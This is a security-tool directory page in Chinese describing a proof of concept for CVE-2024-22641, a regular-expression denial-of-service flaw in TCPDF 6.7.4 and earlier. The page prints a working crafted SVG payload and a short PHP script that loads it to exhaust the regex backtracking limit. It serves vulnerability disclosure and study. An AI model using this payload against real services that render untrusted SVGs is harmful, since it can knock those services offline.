Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-22641 — 针对CVE-2024-22641的概念验证:TCPDF <=6.7.4中由特制SVG文件触发的ReDoS漏洞,演示了正则回溯限制耗尽。 | Kitploit
工具/GitHubGitHub/zunak/cve-2024-22641
漏洞分析漏洞利用Web安全模糊测试论文与研究学习与教育
GitHubzunak/cve-2024-22641

CVE-2024-22641

针对CVE-2024-22641的概念验证:TCPDF <=6.7.4中由特制SVG文件触发的ReDoS漏洞,演示了正则回溯限制耗尽。

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-22641

漏洞类型

正则表达式拒绝服务 (ReDoS)

受影响产品及版本

TCPDF <= 6.7.4

攻击向量

TCPDF 解析包含恶意载荷的 SVG 文件。

描述

TCPDF 版本 <= 6.7.4 在解析不可信的 SVG 文件时容易受到 ReDoS(正则表达式拒绝服务)攻击。

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

注意:使用 preg_last_error() 检查漏洞行后的正则表达式,执行会以 PREG_BACKTRACK_LIMIT_ERROR 退出。

下载工具